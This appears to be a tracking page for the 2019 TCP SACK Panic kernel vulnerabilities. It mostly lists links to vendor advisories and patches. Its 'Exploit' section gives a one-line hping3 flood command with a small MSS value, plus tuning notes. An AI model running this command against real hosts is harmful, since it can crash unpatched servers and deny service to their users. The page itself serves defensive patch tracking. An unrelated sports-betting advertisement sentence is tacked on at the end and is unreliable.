Tracking vendors responses to TCP SACK vulnerabilities

20190618-TLP-WHITE-TCPSACK.MD

Advisory

Netflix has identified several TCP networking vulnerabilities in FreeBSD and Linux kernels.

Details:

See the netflix information security advisory:

• https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md

Exploit

sudo hping3 yourhost --tcp-mss 20 -S --flood

Nota:

• Seems only working on destination:0
• Recommended MSS value: 48

Source: https://twitter.com/joeubuntu/status/1141445492104019968?s=21

TRACK responses

Amazon AWS

• https://aws.amazon.com/security/security-bulletins/AWS-2019-005/
• https://alas.aws.amazon.com/ALAS-2019-1222.html (Linux 1)
• https://alas.aws.amazon.com/AL2/ALAS-2019-1222.html (Linux 2)

Arch

• https://security.archlinux.org/AVG-983
• https://security.archlinux.org/CVE-2019-11477
• https://security.archlinux.org/CVE-2019-11478
• https://security.archlinux.org/CVE-2019-11479

CHECKPOINT

• https://supportcenter.us.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk156192&t=1560933934963

CloudLinux OS

• https://www.cloudlinux.com/cloudlinux-os-blog/entry/don-t-panic-about-tcp-sack-panic-we-re-working-on-it

CoreOS

• https://coreos.com/releases/#2079.6.0

Debian

• https://www.debian.org/security/2019/dsa-4465
• https://security-tracker.debian.org/tracker/CVE-2019-11477
• https://security-tracker.debian.org/tracker/CVE-2019-11478
• https://security-tracker.debian.org/tracker/CVE-2019-11479

DenyAll

• https://documentation.denyall.com/plugins/servlet/mobile?contentId=9739713#content/view/9739713

EngineYard

• https://support.cloud.engineyard.com/hc/en-us/articles/360024889434-MSS-and-SACK-Panic

ExtremeNetworks

• https://gtacknowledge.extremenetworks.com/articles/Solution/000040133

F5 solutions

• https://support.f5.com/csp/article/K78234183

Fedora

• https://bodhi.fedoraproject.org/updates/FEDORA-2019-914542e05c
• https://bodhi.fedoraproject.org/updates/FEDORA-2019-6c3d89b3d0

Fortinet

• https://docs.fortinet.com/document/fortiauthenticator/6.0.2/release-notes/279684/resolved-issues

FreeBSD

• https://www.freebsd.org/security/advisories/FreeBSD-SA-19:08.rack.asc

Google Cloud Platform

• https://cloud.google.com/compute/docs/security-bulletins#20190618

GRSECURITY

• https://twitter.com/grsecurity/status/1140678999410188293

Microsoft

• https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv190020
• https://azure.microsoft.com/en-us/updates/update-19-06-for-azure-sphere-public-preview-now-available-for-evaluation/
• Azure/AKS#1065
• https://azure.microsoft.com/en-us/updates/security-advisory-on-linux-kernel-tcp-vulnerabilities-for-hdinsight-clusters/

MikroTik

• https://blog.mikrotik.com/security/cve-2019-11477-cve-2019-11478-cve-2019-11479.html

Nutanix

• https://hyperhci.com/2019/06/20/nutanix-security-advisory-tcp-sack-panic-overflow-vulnerability/

Oracle Linux

• https://linux.oracle.com/errata/ELSA-2019-4686.html (RHCK kernel)
• https://linux.oracle.com/errata/ELSA-2019-4685.html (UEK5 kernel)
• https://linux.oracle.com/errata/ELSA-2019-4684.html (UEK4 kernel)

OVH

• https://www.ovh.com/fr/blog/linux-kernel-vulnerabilities-affecting-the-selective-ack-component/
• http://travaux.ovh.net/?do=details&id=39092&PHPSESSID=5a708cef0cdceb9909d8701d22f20aa5

Pulse Secure

• https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44193

Red Hat / CentOS

• https://access.redhat.com/security/vulnerabilities/tcpsack
• https://access.redhat.com/security/cve/cve-2019-11477
• https://access.redhat.com/security/cve/cve-2019-11478
• https://access.redhat.com/security/cve/cve-2019-11479

SOPHOS

• https://community.sophos.com/kb/en-us/134237

SUSE / SLES

• https://www.suse.com/de-de/support/kb/doc/?id=7023928
• https://www.suse.com/c/suse-address-the-sack-panic-tcp-remote-denial-of-service-attacks/
• https://www.suse.com/security/cve/CVE-2019-11477/
• https://www.suse.com/security/cve/CVE-2019-11478/
• https://www.suse.com/security/cve/CVE-2019-11479/

Ubuntu

• https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/SACKPanic
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11477.html
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11478.html
• https://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11479.html

VYOS

• https://blog.vyos.io/cve-2019-11477-tcp-sack-panic-and-an-intel-i40e-driver-issue

Stay updated with expert Premier League predictions covering match outcomes, team performance, and season insights. Get reliable forecasts and analysis to follow the league closely and enjoy every fixture with more clarity and confidence.